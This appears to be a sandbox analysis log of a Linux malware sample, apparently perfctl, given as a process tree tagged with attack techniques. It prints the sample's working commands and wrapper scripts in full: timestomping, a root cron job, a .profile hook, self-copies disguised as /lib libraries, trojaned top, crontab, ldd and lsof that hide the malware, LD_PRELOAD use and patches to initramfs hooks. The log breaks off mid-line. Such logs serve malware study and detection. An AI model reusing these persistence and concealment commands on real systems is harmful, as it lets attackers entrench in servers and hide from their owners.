/usr/bin/touchtouch -acmr /bin/sh /bin/perfcc3⤵
- Indicator Removal: Timestomp
PID:2552
-
-
-
/bin/sh/bin/sh -c "touch -acmr /bin/sh /bin/perfcc"2⤵
- Indicator Removal: Timestomp
PID:2573 -
/usr/bin/touchtouch -acmr /bin/sh /bin/perfcc3⤵
- Indicator Removal: Timestomp
PID:2576
-
-
-
/bin/sh/bin/sh -c "touch -acmr /bin/sh /bin/perfcc"2⤵
- Indicator Removal: Timestomp
PID:2619 -
/usr/bin/touchtouch -acmr /bin/sh /bin/perfcc3⤵
- Indicator Removal: Timestomp
PID:2625
-
-
-
/bin/sh/bin/sh -c "(crontab -l|grep -v -e perfcc -e /tmp/.perf;echo '11 * * * * /root/.config/cron/perfcc')|crontab -"2⤵
- Command and Scripting Interpreter: Unix Shell
PID:2670 -
/usr/bin/crontabcrontab -3⤵
- Creates/modifies Cron job
PID:2672
-
-
/usr/bin/crontabcrontab -l3⤵PID:2673
-
-
/usr/bin/grepgrep -v -e perfcc -e /tmp/.perf3⤵PID:2674
-
-
-
/bin/sh/bin/sh -c "sed -n -i '/perfcc/d;p;1a test -x /bin/perfcc && FPROF=p /bin/perfcc' /root/.profile;touch -acmr /bin/sh /root/.profile"2⤵
- Indicator Removal: Timestomp
PID:2684 -
/usr/bin/sedsed -n -i "/perfcc/d;p;1a test -x /bin/perfcc && FPROF=p /bin/perfcc" /root/.profile3⤵PID:2685
-
-
/usr/bin/touchtouch -acmr /bin/sh /root/.profile3⤵
- Indicator Removal: Timestomp
PID:2686
-
-
-
/bin/sh/bin/sh -c "cp /proc/2500/exe /lib/libpprocps.so && chmod +x /lib/libpprocps.so"2⤵
- File and Directory Permissions Modification
PID:2688 -
/usr/bin/cpcp /proc/2500/exe /lib/libpprocps.so3⤵PID:2689
-
-
/usr/bin/chmodchmod +x /lib/libpprocps.so3⤵
- File and Directory Permissions Modification
PID:2690
-
-
-
/bin/sh/bin/sh -c "cp /proc/2500/exe /lib/libfsnldev.so && chmod +x /lib/libfsnldev.so"2⤵
- File and Directory Permissions Modification
PID:2691 -
/usr/bin/cpcp /proc/2500/exe /lib/libfsnldev.so3⤵PID:2692
-
-
/usr/bin/chmodchmod +x /lib/libfsnldev.so3⤵
- File and Directory Permissions Modification
PID:2693
-
-
-
/bin/.local/bin/top/bin/.local/bin/top2⤵PID:2694
-
-
/bin/bash/bin/.local/bin/top -c "exec '/bin/.local/bin/top' \"\$@\"" /bin/.local/bin/top2⤵PID:2694
-
-
/bin/.local/bin/top/bin/.local/bin/top2⤵PID:2694
-
-
/bin/bash/bin/.local/bin/top -c " #!/bin/bash if env|grep -q ABWTRX;then echo ABWTRX00;exit 0;fi r='top' m='perfctl' p=\$(echo \"\$PATH\"|sed 's;/.local/bin;/usr/bin;g' 2>/dev/null) if [ \$? -ne 0 ];then p=\"\${a/\\/.local\\/bin//usr/bin}\" fi export PATH=\$p if env|grep -q AAZHDE; then \$r \$@ else trap 'rm -rf /tmp/smpr &>/dev/null' EXIT trap 'rm -rf /tmp/smpr &>/dev/null' SIGINT touch /tmp/smpr &>/dev/null export AAZHDE=1 pkill -9 \$m &>/dev/null killall -9 \$m &>/dev/null ps -ax|grep \$m|grep -v grep|awk '{print \$1}'|xargs kill -9 &>/dev/null ps -ax|grep \$m|grep -vq grep || rm -rf /tmp/.apid &>/dev/null unset AAZHDE \$r \$@ fi " /bin/.local/bin/top2⤵PID:2694
-
/usr/bin/envenv3⤵PID:2695
-
-
/usr/bin/grepgrep -q ABWTRX3⤵PID:2696
-
-
-
/bin/.local/bin/crontab/bin/.local/bin/crontab2⤵PID:2697
-
-
/bin/bash/bin/.local/bin/crontab -c "exec '/bin/.local/bin/crontab' \"\$@\"" /bin/.local/bin/crontab2⤵PID:2697
-
-
/bin/.local/bin/crontab/bin/.local/bin/crontab2⤵PID:2697
-
-
/bin/bash/bin/.local/bin/crontab -c " #!/bin/bash function rcrj(){ (\$r -l|grep -v -e perfcc -e /tmp/.perf;echo \"11 * * * * \$ap\")|\$r - } if env|grep -q ABWTRX;then echo ABWTRX00;exit 0;fi r='crontab' a='perfcc' ap=\"\$HOME/.config/cron/perfcc\" p=\$(echo \"\$PATH\"|sed 's;/.local/bin;/usr/bin;g' 2>/dev/null) if [ \$? -ne 0 ];then p=\"\${a/\\/.local\\/bin//usr/bin}\" fi export PATH=\$p if env|grep -q AAZHDE; then \$r \$@ else trap rcrj EXIT \$r -l|grep -Fv -e \$a -e /tmp/.perf|\$r - \$r \$@ fi " /bin/.local/bin/crontab2⤵PID:2697
-
/usr/bin/grepgrep -q ABWTRX3⤵PID:2699
-
-
/usr/bin/envenv3⤵PID:2698
-
-
-
/bin/.local/bin/ldd/bin/.local/bin/ldd2⤵PID:2700
-
-
/bin/bash/bin/.local/bin/ldd -c "exec '/bin/.local/bin/ldd' \"\$@\"" /bin/.local/bin/ldd2⤵PID:2700
-
-
/bin/.local/bin/ldd/bin/.local/bin/ldd2⤵PID:2700
-
-
/bin/bash/bin/.local/bin/ldd -c " #!/bin/bash if env|grep -q ABWTRX;then echo ABWTRX00;exit 0;fi r='ldd' p=\$(echo \"\$PATH\"|sed 's;/.local/bin;/usr/bin;g' 2>/dev/null) if [ \$? -ne 0 ];then p=\"\${a/\\/.local\\/bin//usr/bin}\" fi export PATH=\$p if env|grep -q AAZHDE; then \$r \$@ else \$r \$@ | grep -v gcwrap fi " /bin/.local/bin/ldd2⤵PID:2700
-
/usr/bin/envenv3⤵PID:2701
-
-
/usr/bin/grepgrep -q ABWTRX3⤵PID:2702
-
-
-
/bin/.local/bin/lsof/bin/.local/bin/lsof2⤵PID:2703
-
-
/bin/bash/bin/.local/bin/lsof -c "exec '/bin/.local/bin/lsof' \"\$@\"" /bin/.local/bin/lsof2⤵PID:2703
-
-
/bin/.local/bin/lsof/bin/.local/bin/lsof2⤵PID:2703
-
-
/bin/bash/bin/.local/bin/lsof -c " #!/bin/bash if env|grep -q ABWTRX;then echo ABWTRX00;exit 0;fi r='lsof' p=\$(echo \"\$PATH\"|sed 's;/.local/bin;/usr/bin;g' 2>/dev/null) if [ \$? -ne 0 ];then p=\"\${a/\\/.local\\/bin//usr/bin}\" fi export PATH=\$p if env|grep -q AAZHDE; then \$r \$@ else \$r \$@ | grep -Fv -e 'perfcc' -e 'perfctl' -e '.dmesg' -e '.xdiag' -e 'gcwrap' fi " /bin/.local/bin/lsof2⤵PID:2703
-
/usr/bin/envenv3⤵PID:2704
-
-
/usr/bin/grepgrep -q ABWTRX3⤵PID:2705
-
-
-
/bin/sh/bin/sh -c "chmod 755 /bin/.local/bin/*;touch -acmr /etc/passwd /bin/.local/bin/*"2⤵
- File and Directory Permissions Modification
PID:2706 -
/usr/bin/chmodchmod 755 /bin/.local/bin/crontab /bin/.local/bin/ldd /bin/.local/bin/lsof /bin/.local/bin/top3⤵
- File and Directory Permissions Modification
PID:2707
-
-
/usr/bin/touchtouch -acmr /etc/passwd /bin/.local/bin/crontab /bin/.local/bin/ldd /bin/.local/bin/lsof /bin/.local/bin/top3⤵
- Indicator Removal: Timestomp
PID:2708
-
-
-
/bin/sh/bin/sh -c "touch /tmp/lgcdm /tmp/d.xdiag-0;unset AAZHDE;LD_PRELOAD=/tmp/libgcwrap.so LGCEXTR=1 ls -la /tmp > /tmp/lgctr 2>&1;rm -f /tmp/d.xdiag-0 /tmp/lgcdm /tmp/libgcwrap.so"2⤵
- Command and Scripting Interpreter: Unix Shell
- Writes file to tmp directory
PID:2709 -
/usr/bin/touchtouch /tmp/lgcdm /tmp/d.xdiag-03⤵
- Disables SELinux
- Writes file to tmp directory
PID:2710
-
-
/usr/bin/lsls -la /tmp3⤵PID:2711
-
-
/usr/bin/rmrm -f /tmp/d.xdiag-0 /tmp/lgcdm /tmp/libgcwrap.so3⤵PID:2712
-
-
-
/bin/sh/bin/sh -c "LD_PRELOAD=/tmp/libgcwrap.so sh -c 'echo BAQLznamq9t08rtq7O5LDzm0K5nqROAs|cat > /tmp/lgctr2 2>&1'"2⤵
- Command and Scripting Interpreter: Unix Shell
PID:2713 -
/usr/bin/shsh -c "echo BAQLznamq9t08rtq7O5LDzm0K5nqROAs|cat > /tmp/lgctr2 2>&1"3⤵
- Writes file to tmp directory
PID:2714 -
/usr/bin/catcat4⤵PID:2716
-
-
-
-
/bin/sh/bin/sh -c "chmod g+s /lib/libgcwrap.so"2⤵
- Command and Scripting Interpreter: Unix Shell
PID:2717 -
/usr/bin/chmodchmod g+s /lib/libgcwrap.so3⤵
- Modifies special file permissions
PID:2718
-
-
-
/bin/sh/bin/sh -c "for f in \$(find /usr/share/initramfs-tools/hooks -type f 2>/dev/null|xargs grep -s -l 'ldd '|xargs grep -L 'export PATH=.*/\\.local/bin:.PATH');do sed -i '/^#!\\//a export PATH=/bin/.local/bin:\$PATH' \$f;done"2⤵
- Command and Scripting Interpreter: Unix Shell
PID:2719 -
/usr/bin/findfind /usr/share/initramfs-tools/hooks -type f3⤵PID:2721
-
-
/usr/bin/xargsxargs grep -s -l "ldd "3⤵PID:2722
-
/tmp/.perf.c/grepgrep -s -l "ldd " /usr/share/initramfs-tools/hooks/mdadm /usr/share/initramfs-tools/hooks/thin-provisioning-tools /usr/share/initramfs-tools/hooks/brltty /usr/share/initramfs-tools/hooks/console_setup /usr/share/initramfs-tools/hooks/iscsi /usr/share/initramfs-tools/hooks/dhcpcd /usr/share/initramfs-tools/hooks/cryptkeyctl /usr/share/initramfs-tools/hooks/resume /usr/share/initramfs-tools/hooks/thermal /usr/share/initramfs-tools/hooks/btrfs /usr/share/initramfs-tools/hooks/bcache /usr/share/initramfs-tools/hooks/plymouth /usr/share/initramfs-tools/hooks/cryptgnupg /usr/share/initramfs-tools/hooks/cryptroot /usr/share/initramfs-tools/hooks/zz-busybox-initramfs /usr/share/initramfs-tools/hooks/fsck /usr/share/initramfs-tools/hooks/sg3-utils /usr/share/initramfs-tools/hooks/klibc-utils /usr/share/initramfs-tools/hooks/xfs /usr/share/initramfs-tools/hooks/framebuffer /usr/share/initramfs-tools/hooks/kmod /usr/share/initramfs-tools/hooks/udev /usr/share/initramfs-tools/hooks/fixrtc /usr/share/initramfs-tools/hooks/intel_microcode /usr/share/initramfs-tools/hooks/cryptroot-unlock /usr/share/initramfs-tools/hooks/cryptgnupg-sc /usr/share/initramfs-tools/hooks/amd64_microcode /usr/share/initramfs-tools/hooks/fuse /usr/share/initramfs-tools/hooks/kbd /usr/share/initramfs-tools/hooks/ntfs_3g /usr/share/initramfs-tools/hooks/lvm2 /usr/share/initramfs-tools/hooks/dmsetup /usr/share/initramfs-tools/hooks/cryptopensc /usr/share/initramfs-tools/hooks/cryptpassdev4⤵PID:2724
-
-
/tmp/grepgrep -s -l "ldd " /usr/share/initramfs-tools/hooks/mdadm /usr/share/initramfs-tools/hooks/thin-provisioning-tools /usr/share/initramfs-tools/hooks/brltty /usr/share/initramfs-tools/hooks/console_setup /usr/share/initramfs-tools/hooks/iscsi /usr/share/initramfs-tools/hooks/dhcpcd /usr/share/initramfs-tools/hooks/cryptkeyctl /usr/share/initramfs-tools/hooks/resume /usr/share/initramfs-tools/hooks/thermal /usr/share/initramfs-tools/hooks/btrfs /usr/share/initramfs-tools/hooks/bcache /usr/share/initramfs-tools/hooks/plymouth /usr/share/initramfs-tools/hooks/cryptgnupg /usr/share/initramfs-tools/hooks/cryptroot /usr/share/initramfs-tools/hooks/zz-busybox-initramfs /usr/share/initramfs-tools/hooks/fsck /usr/share/initramfs-tools/hooks/sg3-utils /usr/share/initramfs-tools/hooks/klibc-utils /usr/share/initramfs-tools/hooks/xfs /usr/share/initramfs-tools/hooks/framebuffer /usr/share/initramfs-tools/hooks/kmod /usr/share/initramfs-tools/hooks/udev /usr/share/initramfs-tools/hooks/fixrtc /usr/share/initramfs-tools/hooks/intel_microcode /usr/share/initramfs-tools/hooks/cryptroot-unlock /usr/share/initramfs-tools/hooks/cryptgnupg-sc /usr/share/initramfs-tools/hooks/amd64_microcode /usr/share/initramfs-tools/hooks/fuse /usr/share/initramfs-tools/hooks/kbd /usr/share/initramfs-tools/hooks/ntfs_3g /usr/share/initramfs-tools/hooks/lvm2 /usr/share/initramfs-tools/hooks/dmsetup /usr/share/initramfs-tools/hooks/cryptopensc /usr/share/initramfs-tools/hooks/cryptpassdev4⤵PID:2724
-
-
/usr/local/sbin/grepgrep -s -l "ldd " /usr/share/initramfs-tools/hooks/mdadm /usr/share/initramfs-tools/hooks/thin-provisioning-tools /usr/share/initramfs-tools/hooks/brltty /usr/share/initramfs-tools/hooks/console_setup /usr/share/initramfs-tools/hooks/iscsi /usr/share/initramfs-tools/hooks/dhcpcd /usr/share/initramfs-tools/hooks/cryptkeyctl /usr/share/initramfs-tools/hooks/resume /usr/share/initramfs-tools/hooks/thermal /usr/share/initramfs-tools/hooks/btrfs /usr/share/initramfs-tools/hooks/bcache /usr/share/initramfs-tools/hooks/plymouth /usr/share/initramfs-tools/hooks/cryptgnupg /usr/share/initramfs-tools/hooks/cryptroot /usr/share/initramfs-tools/hooks/zz-busybox-initramfs /usr/share/initramfs-tools/hooks/fsck /usr/share/initramfs-tools/hooks/sg3-utils /usr/share/initramfs-tools/hooks/klibc-utils /usr/share/initramfs-tools/hooks/xfs /usr/share/initramfs-tools/hooks/framebuffer /usr/share/initramfs-tools/hooks/kmod /usr/share/initramfs-tools/hooks/udev /usr/share/initramfs-tools/hooks/fixrtc /usr/share/initramfs-tools/hooks/intel_microcode /usr/share/initramfs-tools/hooks/cryptroot-unlock /usr/share/initramfs-tools/hooks/cryptgnupg-sc /usr/share/initramfs-tools/hooks/amd64_microcode /usr/share/initramfs-tools/hooks/fuse /usr/share/initramfs-tools/hooks/kbd /usr/share/initramfs-tools/hooks/ntfs_3g /usr/share/initramfs-tools/hooks/lvm2 /usr/share/initramfs-tools/hooks/dmsetup /usr/share/initramfs-tools/hooks/cryptopensc /usr/share/initramfs-tools/hooks/cryptpassdev4⤵PID:2724
-
-
/usr/local/bin/grepgrep -s -l "ldd " /usr/share/initramfs-tools/hooks/mdadm /usr/share/initramfs-tools/hooks/thin-provisioning-tools /usr/share/initramfs-tools/hooks/brltty /usr/share/initramfs-tools/hooks/console_setup /usr/share/initramfs-tools/hooks/iscsi /usr/share/initramfs-tools/hooks/dhcpcd /usr/share/initramfs-tools/hooks/cryptkeyctl /usr/share/initramfs-tools/hooks/resume /usr/share/initramfs-tools/hooks/thermal /usr/share/initramfs-tools/hooks/btrfs /usr/share/initramfs-tools/hooks/bcache /usr/share/initramfs-tools/hooks/plymouth /usr/share/initramfs-tools/hooks/cryptgnupg /usr/share/initramfs-tools/hooks/cryptroot /usr/share/initramfs-tools/hooks/zz-busybox-initramfs /usr/share/initramfs-tools/hooks/fsck /usr/share/initramfs-tools/hooks/sg3-utils /usr/share/initramfs-tools/hooks/klibc-utils /usr/share/initramfs-tools/hooks/xfs /usr/share/initramfs-tools/hooks/framebuffer /usr/share/initramfs-tools/hooks/kmod /usr/share/initramfs-tools/hooks/udev /usr/share/initramfs-tools/hooks/fixrtc /usr/share/initramfs-tools/hooks/intel_microcode /usr/share/initramfs-tools/hooks/cryptroot-unlock /usr/share/initramfs-tools/hooks/cryptgnupg-sc /usr/share/initramfs-tools/hooks/amd64_microcode /usr/share/initramfs-tools/hooks/fuse /usr/share/initramfs-tools/hooks/kbd /usr/share/initramfs-tools/hooks/ntfs_3g /usr/share/initramfs-tools/hooks/lvm2 /usr/share/initramfs-tools/hooks/dmsetup /usr/share/initramfs-tools/hooks/cryptopensc /usr/share/initramfs-tools/hooks/cryptpassdev4⤵PID:2724
-
-
/usr/sbin/grepgrep -s -l "ldd " /usr/share/initramfs-tools/hooks/mdadm /usr/share/initramfs-tools/hooks/thin-provisioning-tools /usr/share/initramfs-tools/hooks/brltty /usr/share/initramfs-tools/hooks/console_setup /usr/share/initramfs-tools/hooks/iscsi /usr/share/initramfs-tools/hooks/dhcpcd /usr/share/initramfs-tools/hooks/cryptkeyctl /usr/share/initramfs-tools/hooks/resume /usr/share/initramfs-tools/hooks/thermal /usr/share/initramfs-tools/hooks/btrfs /usr/share/initramfs-tools/hooks/bcache /usr/share/initramfs-tools/hooks/plymouth /usr/share/initramfs-tools/hooks/cryptgnupg /usr/share/initramfs-tools/hooks/cryptroot /usr/share/initramfs-tools/hooks/zz-busybox-initramfs /usr/share/initramfs-tools/hooks/fsck /usr/share/initramfs-tools/hooks/sg3-utils /usr/share/initramfs-tools/hooks/klibc-utils /usr/share/initramfs-tools/hooks/xfs /usr/share/initramfs-tools/hooks/framebuffer /usr/share/initramfs-tools/hooks/kmod /usr/share/initramfs-tools/hooks/udev /usr/share/initramfs-tools/hooks/fixrtc /usr/share/initramfs-tools/hooks/intel_microcode /usr/share/initramfs-tools/hooks/cryptroot-unlock /usr/share/initramfs-tools/hooks/cryptgnupg-sc /usr/share/initramfs-tools/hooks/amd64_microcode /usr/share/initramfs-tools/hooks/fuse /usr/share/initramfs-tools/hooks/kbd /usr/share/initramfs-tools/hooks/ntfs_3g /usr/share/initramfs-tools/hooks/lvm2 /usr/share/initramfs-tools/hooks/dmsetup /usr/share/initramfs-tools/hooks/cryptopensc /usr/share/initramfs-tools/hooks/cryptpassdev4⤵PID:2724
-
-
/usr/bin/grepgrep -s -l "ldd " /usr/share/initramfs-tools/hooks/mdadm /usr/share/initramfs-tools/hooks/thin-provisioning-tools /usr/share/initramfs-tools/hooks/brltty /usr/share/initramfs-tools/hooks/console_setup /usr/share/initramfs-tools/hooks/iscsi /usr/share/initramfs-tools/hooks/dhcpcd /usr/share/initramfs-tools/hooks/cryptkeyctl /usr/share/initramfs-tools/hooks/resume /usr/share/initramfs-tools/hooks/thermal /usr/share/initramfs-tools/hooks/btrfs /usr/share/initramfs-tools/hooks/bcache /usr/share/initramfs-tools/hooks/plymouth /usr/share/initramfs-tools/hooks/cryptgnupg /usr/share/initramfs-tools/hooks/cryptroot /usr/share/initramfs-tools/hooks/zz-busybox-initramfs /usr/share/initramfs-tools/hooks/fsck /usr/share/initramfs-tools/hooks/sg3-utils /usr/share/initramfs-tools/hooks/klibc-utils /usr/share/initramfs-tools/hooks/xfs /usr/share/initramfs-tools/hooks/framebuffer /usr/share/initramfs-tools/hooks/kmod /usr/share/initramfs-tools/hooks/udev /usr/share/initramfs-tools/hooks/fixrtc /usr/share/initramfs-tools/hooks/intel_microcode /usr/share/initramfs-tools/hooks/cryptroot-unlock /usr/share/initramfs-tools/hooks/cryptgnupg-sc /usr/share/initramfs-tools/hooks/amd64_microcode /usr/share/initramfs-tools/hooks/fuse /usr/share/initramfs-tools/hooks/kbd /usr/share/initramfs-tools/hooks/ntfs_3g /usr/share/initramfs-tools/hooks/lvm2 /usr/share/initramfs-tools/hooks/dmsetup /usr/share/initramfs-tools/hooks/cryptopensc /usr/share/initramfs-tools/hooks/cryptpassdev4⤵PID:2724
-
-
-
/usr/bin/xargsxargs grep -L "export PATH=.*/\\.local/bin:.PATH"3⤵PID:2723
-
/tmp/.perf.c/grepgrep -L "export PATH=.*/\\.local/bin:.PATH" /usr/share/initramfs-tools/hooks/dhcpcd /usr/share/initramfs-tools/hooks/cryptroot4⤵PID:2727
-
-
/tmp/grepgrep -L "export PATH=.*/\\.local/bin:.PATH" /usr/share/initramfs-tools/hooks/dhcpcd /usr/share/initramfs-tools/hooks/cryptroot4⤵PID:2727
-
-
/usr/local/sbin/grepgrep -L "export PATH=.*/\\.local/bin:.PATH" /usr/share/initramfs-tools/hooks/dhcpcd /usr/share/initramfs-tools/hooks/cryptroot4⤵PID:2727
-
-
/usr/local/bin/grepgrep -L "export PATH=.*/\\.local/bin:.PATH" /usr/share/initramfs-tools/hooks/dhcpcd /usr/share/initramfs-tools/hooks/cryptroot4⤵PID:2727
-
-
/usr/sbin/grepgrep -L "export PATH=.*/\\.local/bin:.PATH" /usr/share/initramfs-tools/hooks/dhcpcd /usr/share/initramfs-tools/hooks/cryptroot4⤵PID:2727
-
-
/usr/bin/grepgrep -L "export PATH=.*/\\.local/bin:.PATH" /usr/share/initramfs-tools/hooks/dhcpcd /usr/share/initramfs-tools/hooks/cryptroot4⤵PID:2727
-
-
-
/usr/bin/sedsed -i "/^#!\\//a export PATH=/bin/.local/bin:\$PATH" /usr/share/initramfs-tools/hooks/dhcpcd3⤵PID:2728
-
-
/usr/bin/sedsed -i "/^#!\\//a export PATH=/bin/.local/bin:\$PATH" /usr/share/initramfs-tools/hooks/cryptroot3⤵PID:2729
-
-
-
/bin/sh/bin/sh -c "systemctl --type=service --state=running|grep -F -e cron.service -e crond.service -e unattended-upgrades.service -e nginx.service -e apache2.service -e httpd.service -e ssh.service -e sshd.service -e postfix.service -e dovecot.service -e mariadb.service -e mysql.service -e mysqld.service -e systemd-journald|awk '{print \$1}'|xargs -I{} systemctl try-restart {} >/dev/null 2>/dev/null"2⤵
- Command and Scripting Interpreter: Unix Shell
PID:2731 -
/usr/bin/systemctlsystemctl "--type=service" "--state=running"3⤵PID:2733
-
-
/usr/bin/grepgrep -F -e cron.service -e crond.service -e unattended-upgrades.service -e nginx.service -e apache2.service -e httpd.service -e ssh.service -e sshd.service -e postfix.service -e dovecot.service -e mariadb.service -e mysql.service -e mysqld.service -e systemd-journald3⤵PID:2734
-
-
/usr/bin/awkawk "{print \$1}"3⤵PID:2735
-
-
/usr/bin/xargsxargs "-I{}" systemctl try-restart "{}"3⤵PID:2737
-
/tmp/.perf.c/systemctlsystemctl try-restart cron.service4⤵PID:2869
-
-
/tmp/systemctlsystemctl try-restart cron.service4⤵PID:2869
-
-
/usr/local/sbin/systemctlsystemctl try-restart cron.service4⤵PID:2869
-
-
/usr/local/bin/systemctlsystemctl try-restart cron.service4⤵PID:2869
-
-
/usr/sbin/systemctlsystemctl try-restart cron.service4⤵PID:2869
-
-
/usr/bin/systemctlsystemctl try-restart cron.service4⤵PID:2869
-
-
/tmp/.perf.c/systemctlsystemctl try-restart systemd-journald.service4⤵PID:3246
-
-
/tmp/systemctlsystemctl try-restart systemd-journald.service4⤵PID:3246
-
-
/usr/local/sbin/systemctlsystemctl try-restart systemd-journald.service4⤵PID:3246
-
-
/usr/local/bin/systemctlsystemctl try-restart systemd-journald.service4⤵PID:3246
-
-
/usr/sbin/systemctlsystemctl try-restart systemd-journald.service4⤵PID:3246
-
-
/usr/bin/systemctlsystemctl try-restart systemd-journald.service4⤵PID:3246
-
-
/tmp/.perf.c/systemctlsystemctl try-restart unattended-upgrades.service4⤵PID:3258
-
-
/tmp/systemctlsystemctl try-restart unattended-upgrades.service4⤵PID:3258
-
-
/usr/local/sbin/systemctlsystemctl try-restart unattended-upgrades.service4⤵PID:3258
-
-
/usr/local/bin/systemctlsystemctl try-restart unattended-upgrades.service4⤵PID:3258
-
-
/usr/sbin/systemctlsystemctl try-restart unattended-upgrades.service4⤵PID:3258
-
-
/usr/bin/systemctlsystemctl try-restart unattended-upgrades.service4⤵PID:3258
-
-
-
-
/bin/sh/bin/sh -c "echo '/etc/coredumps/%e.%p.%u.%t' > /proc/sys/kernel/core_pattern"2⤵
- Command and Scripting Interpreter: Unix Shell
PID:2732
-
-
/bin/sh/bin/sh -c "for f in \$(find /usr/share/initramfs-tools/hooks -type f 2>/dev/null|xargs grep -s -l 'ldd '|xargs grep -L 'export PATH=.*/\\.local/bin:.PATH');do sed -i '/^#!\\//a export PATH=/bin/.local/bin:\$PATH' \$f;done"2⤵
- Command and Scripting Interpreter: Unix Shell
PID:2736 -
/usr/bin/findfind /usr/share/initramfs-tools/hooks -type f3⤵PID:2739
-
-
/usr/bin/xargsxargs grep -s -l "ldd "3⤵PID:2740
-
/tmp/.perf.c/grepgrep -s -l "ldd " /usr/share/initramfs-tools/hooks/mdadm /usr/share/initramfs-tools/hooks/thin-provisioning-tools /usr/share/initramfs-tools/hooks/brltty /usr/share/initramfs-tools/hooks/console_setup /usr/share/initramfs-tools/hooks/iscsi /usr/share/initramfs-tools/hooks/dhcpcd /usr/share/initramfs-tools/hooks/cryptkeyctl /usr/share/initramfs-tools/hooks/resume /usr/share/initramfs-tools/hooks/thermal /usr/share/initramfs-tools/hooks/btrfs /usr/share/initramfs-tools/hooks/bcache /usr/share/initramfs-tools/hooks/plymouth /usr/share/initramfs-tools/hooks/cryptgnupg /usr/share/initramfs-tools/hooks/cryptroot /usr/share/initramfs-tools/hooks/zz-busybox-initramfs /usr/share/initramfs-tools/hooks/fsck /usr/share/initramfs-tools/hooks/sg3-utils /usr/share/initramfs-tools/hooks/klibc-utils /usr/share/initramfs-tools/hooks/xfs /usr/share/initramfs-tools/hooks/framebuffer /usr/share/initramfs-tools/hooks/kmod /usr/share/initramfs-tools/hooks/udev /usr/share/initramfs-tools/hooks/fixrtc /usr/share/initramfs-tools/hooks/intel_microcode /usr/share/initramfs-tools/hooks/cryptroot-unlock /usr/share/initramfs-tools/hooks/cryptgnupg-sc /usr/share/initramfs-tools/hooks/amd64_microcode /usr/share/initramfs-tools/hooks/fuse /usr/share/initramfs-tools/hooks/kbd /usr/share/initramfs-tools/hooks/ntfs_3g /usr/share/initramfs-tools/hooks/lvm2 /usr/share/initramfs-tools/hooks/dmsetup /usr/share/initramfs-tools/hooks/cryptopensc /usr/share/initramfs-tools/hooks/cryptpassdev4⤵PID:2751
-
-
/tmp/grepgrep -s -l "ldd " /usr/share/initramfs-tools/hooks/mdadm /usr/share/initramfs-tools/hooks/thin-provisioning-tools /usr/share/initramfs-tools/hooks/brltty /usr/share/initramfs-tools/hooks/console_setup /usr/share/initramfs-tools/hooks/iscsi /usr/share/initramfs-tools/hooks/dhcpcd /usr/share/initramfs-tools/hooks/cryptkeyctl /usr/share/initramfs-tools/hooks/resume /usr/share/initramfs-tools/hooks/thermal /usr/share/initramfs-tools/hooks/btrfs /usr/share/initramfs-tools/hooks/bcache /usr/share/initramfs-tools/hooks/plymouth /usr/share/initramfs-tools/hooks/cryptgnupg /usr/share/initramfs-tools/hooks/cryptroot /usr/share/initramfs-tools/hooks/zz-busybox-initramfs /usr/share/initramfs-tools/hooks/fsck /usr/share/initramfs-tools/hooks/sg3-utils /usr/share/initramfs-tools/hooks/klibc-utils /usr/share/initramfs-tools/hooks/xfs /usr/share/initramfs-tools/hooks/framebuffer /usr/share/initramfs-tools/hooks/kmod /usr/share/initramfs-tools/hooks/udev /usr/share/initramfs-tools/hooks/fixrtc /usr/share/initramfs-tools/hooks/intel_microcode /usr/share/initramfs-tools/hooks/cryptroot-unlock /usr/share/initramfs-tools/hooks/cryptgnupg-sc /usr/share/initramfs-tools/hooks/amd64_microcode /usr/share/initramfs-tools/hooks/fuse /usr/share/initramfs-tools/hooks/kbd /usr/share/initramfs-tools/hooks/ntfs_3g /usr/share/initramfs-tools/hooks/lvm2 /usr/share/initramfs-tools/hooks/dmsetup /usr/share/initramfs-tools/hooks/cryptopensc /usr/share/initramfs-tools/hooks/cryptpassdev4⤵PID:2751
-
-
/usr/local/sbin/grepgrep -s -l "ldd " /usr/share/initramfs-tools/hooks/mdadm /usr/share/initramfs-tools/hooks/thin-provisioning-tools /usr/share/initramfs-tools/hooks/brltty /usr/share/initramfs-tools/hooks/console_setup /usr/share/initramfs-tools/hooks/iscsi /usr/share/initramfs-tools/hooks/dhcpcd /usr/share/initramfs-tools/hooks/cryptkeyctl /usr/share/initramfs-tools/hooks/resume /usr/share/initramfs-tools/hooks/thermal /usr/share/initramfs-tools/hooks/btrfs /usr/share/initramfs-tools/hooks/bcache /usr/share/initramfs-tools/hooks/plymouth /usr/share/initramfs-tools/hooks/cryptgnupg /usr/share/initramfs-tools/hooks/cryptroot /usr/share/initramfs-tools/hooks/zz-busybox-initramfs /usr/share/initramfs-tools/hooks/fsck /usr/share/initramfs-tools/hooks/sg3-utils /usr/share/initramfs-tools/hooks/klibc-utils /usr/share/initramfs-tools/hooks/xfs /usr/share/initramfs-tools/hooks/framebuffer /usr/share/initramfs-tools/hooks/kmod /usr/share/initramfs-tools/hooks/udev /usr/share/initramfs-tools/hooks/fixrtc /usr/share/initramfs-tools/hooks/intel_microcode /usr/share/initramfs-tools/hooks/cryptroot-unlock /usr/share/initramfs-tools/hooks/cryptgnupg-sc /usr/share/initramfs-tools/hooks/amd64_microcode /usr/share/initramfs-tools/hooks/fuse /usr/share/initramfs-tools/hooks/kbd /usr/share/initramfs-tools/hooks/ntfs_3g /usr/share/initramfs-tools/hooks/lvm2 /usr/share/initramfs-tools/hooks/dmsetup /usr/share/initramfs-tools/hooks/cryptopensc /usr/share/initramfs-tools/hooks/cryptpassdev4⤵PID:2751
-
-
/usr/local/bin/grepgrep -s -l "ldd " /usr/share/initramfs-tools/hooks/mdadm /usr/share/initramfs-tools/hooks/thin-provisioning-tools /usr/share/initramfs-tools/hooks/brltty /usr/share/initramfs-tools/hooks/console_setup /usr/share/initramfs-tools/hooks/iscsi /usr/share/initramfs-tools/hooks/dhcpcd /usr/share/initramfs-tools/hooks/cryptkeyctl /usr/share/initramfs-tools/hooks/resume /usr/share/initramfs-tools/hooks/thermal /usr/share/initramfs-tools/hooks/btrfs /usr/share/initramfs-tools/hooks/bcache /usr/share/initramfs-tools/hooks/plymouth /usr/share/initramfs-tools/hooks/cryptgnupg /usr/share/initramfs-tools/hooks/cryptroot /usr/share/initramfs-tools/hooks/zz-busybox-initramfs /usr/share/initramfs-tools/hooks/fsck /usr/share/initramfs-tools/hooks/sg3-utils /usr/share/initramfs-tools/hooks/klibc-utils /usr/share/initramfs-tools/hooks/xfs /usr/share/initramfs-tools/hooks/framebuffer /usr/share/initramfs-tools/hooks/kmod /usr/share/initramfs-tools/hooks/udev /usr/share/initramfs-tools/hooks/fixrtc /usr/share/initramfs-tools/hooks/intel_microcode 